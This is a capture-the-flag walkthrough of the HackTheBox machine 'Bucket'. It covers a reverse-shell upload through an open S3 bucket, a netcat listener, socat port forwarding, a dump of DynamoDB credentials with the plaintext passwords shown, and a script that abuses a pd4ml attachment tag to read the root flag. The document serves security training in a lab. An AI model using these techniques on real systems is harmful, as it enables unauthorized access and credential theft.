Bucket - [HTB]

Cover Image for Bucket - [HTB]
Marmeus
Marmeus

Introduction

Bucket is a medium-hard HackTheBox machine where you will have to learn AWS buckets in order to upload a reverse shell, then in order to get the user's credentials you will need to learn about AWS DynamoDB so you can retrieve some users and passwords. Finally, you will have to exploit a service running inside a private AWS web service under construction to extract the root flag.

Enumeration

As always let's start scanning all opening ports in the box.

kali@kali:$ sudo nmap -sS -p- --open -T5 -n 10.10.10.212 -oN AllPorts.txt
tarting Nmap 7.91 ( https://nmap.org ) at 2020-10-31 07:19 EDT
Nmap scan report for 10.10.10.212
Host is up (0.046s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Then, continue with an exhaustively scan of each port.

kali@kali:$ sudo nmap -sC -sV -p22,80 -n 10.10.10.212 -oN PortDepth.txt
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|_  256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Because there is nothing interesting let's have a look to the web page.

bucket.htb

It seems like an informative page about cybersecurity. Looking inside the code there is a piece of code with a different domain where images are stored.

<div class="coffee">
	<img src="http://s3.bucket.htb/adserver/images/bug.jpg" alt="Bug" height="160" width="160">
</div>

Once added the domain to the /etc/hosts file, we can get access to the domain, finding the following page.

s3.bucket.htb

This is because we are getting access to a s3 aws bucket.

Amazon Simple Storage Service is an object storage service that you can interact using the command line, doing things like uploading files.

In order to do so, you need to install aws-cli. You can find the aws-cli documentation in this link.

kali@kali:$ sudo apt-get install awscli -y

Exploit

Once installed the program, it must be configured running the following command (It doesn't matter what you write).

kali@kali:$ aws configure
AWS Access Key ID []: 1234
AWS Secret Access Key []: 1234
Default region name []: 1234
Default output format []: text

Then, in order to upload a PHP reverse shell file you need to run the following command (Must be edited before uploading it) :

aws s3 cp shell.php --endpoint-url http://s3.bucket.htb s3://adserver/

The cp parameter is to copy and --endpoint-url specify the bucket where the command will be executed.

After that, you need to put a listening port with netcat and access to the following direction

kali@kali:$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.84] from (UNKNOWN) [10.10.10.212] 43736
Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 16:36:12 up 19:00,  0 users,  load average: 0.09, 0.07, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation 1

Before becoming the user roy , I think it is mandatory to upgrade our shell.

roy:x:1000:1000:,,,:/home/roy:/bin/bash

To do so you need to write the following commands:

python3 -c "import pty; pty.spawn('/bin/bash')"
[Crtl+z]
stty raw -echo
fg
reset
screen
export TERM=screen
export SHELL=/bin/bash
stty rows 60 columns 235

No we are able to use Ctrl+c, Ctrl+L and the keyboard arrows.

Coming back to the machine, we have read permissions in the roy's folder, where there is a folder named project. Having a look inside there is a php file with information about a dynamo data base (Amazon DynamoDB is a NoSQL database).

www-data@bucket:/home/roy/project$ cat db.php 
<?php
require 'vendor/autoload.php';
date_default_timezone_set('America/New_York');
use Aws\DynamoDb\DynamoDbClient;
use Aws\DynamoDb\Exception\DynamoDbException;

$client = new Aws\Sdk([
    'profile' => 'default',
    'region'  => 'us-east-1',
    'version' => 'latest',
    'endpoint' => 'http://localhost:4566'
]);

$dynamodb = $client->createDynamoDb();

//todo

This database is listing in the 4566 port, using netcat we can retrieve all listening ports.

www-data@bucket:/$ netstat -pluton
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     Timer
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
tcp        0      0 127.0.0.1:4566          0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
tcp        0      0 127.0.0.1:35109         0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      -                    off (0.00/0/0)
tcp6       0      0 :::80                   :::*                    LISTEN      -                    off (0.00/0/0)
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                    off (0.00/0/0)

The port 53 corresponds to a DNS service, 22 to SSH, 80 to Apache, 35109 no clue XD. In order to access to ports 8000 and 4566 from our kali machine I am using socat.

To upload socat you need to execute these commands.

Kali@kali:$ nc -lp 4445 < socat 
www-data@bucket:/tmp$ nc -w 3 10.10.14.64 4445 > socat
www-data@bucket:/tmp$ chmod +x socat

Thanks to socat we are able to redirect all the incoming data from port 4445 to 4566 and we can do the same for port 8000 with port 4446.

www-data@bucket:/tmp$ ./socat TCP4-LISTEN:4445,fork TCP4:127.0.0.1:8000 &
www-data@bucket:/tmp$ ./socat TCP4-LISTEN:4446,fork TCP4:127.0.0.1:4566 &

For one side, accessing to http://bucket.htb:4445/ from our kali machine we get this website under construction.

bucket.htb under construction

From the other site, using aws cli we can get retrieve all the tables int the site's dynamo database.

kali@kali:$ aws dynamodb list-tables --endpoint-url http://bucket.htb:4446 
TABLENAMES users

Then, we can get all the information inside the users table.

kali@kali:$ aws dynamodb scan --table-name users --endpoint-url http://bucket.htb:4446
None    3       3
PASSWORD        Management@#1@#
USERNAME        Mgmt
PASSWORD        Welcome123!
USERNAME        Cloudadm
PASSWORD        n2vM-<_K_Q:.Aa2
USERNAME        Sysadm

With try and error, the password n2vM-<_K_Q:.Aa2 is also used by roy to login to the machine.

Privilege Escalation 2

Now, we can access to the directory bucket-app located in /var/www/.

Inside the index.php file there is the following php code.

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}
else
{
?>

What the code does is to handle post requests with the name parameter "action" and the value get_alerts, then takes all rows with title "Ransomware" from the table alerts of the dynamoDB. Finally, for each row creates a random HTML file with the contents of the columnc data from the alerts, creating a PDF file in the files directory named as resuld.pdf using p4dml_demo.jar.

PD4ML is a Java library, which makes possible to create PDF documents from Java and JSP applications using HTML as template language.

Looking into the PD4ML documentation there is an HTML tag <pd4ml:attachment\> which embeds external resource as PDF attachment.

In order to retrieve the user flag, you need to write an script to do all the following tasks as soon as possible; because there is a cron job which erase everything from the database and the files folder.

The script is the following.

#!/bin/bash

aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment src=\"/root/root.txt\" description=\"Root Flag\" icon=\"Paperclip\">"}}' --endpoint-url http://127.0.0.1:4566

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000

rm /tmp/result.pdf
cp /var/www/bucket-app/files/result.pdf /tmp/

Finally, you must execute the script inside the box, download the resulting pdf, open it and click in the image and obtain the root's flag.

result.pdf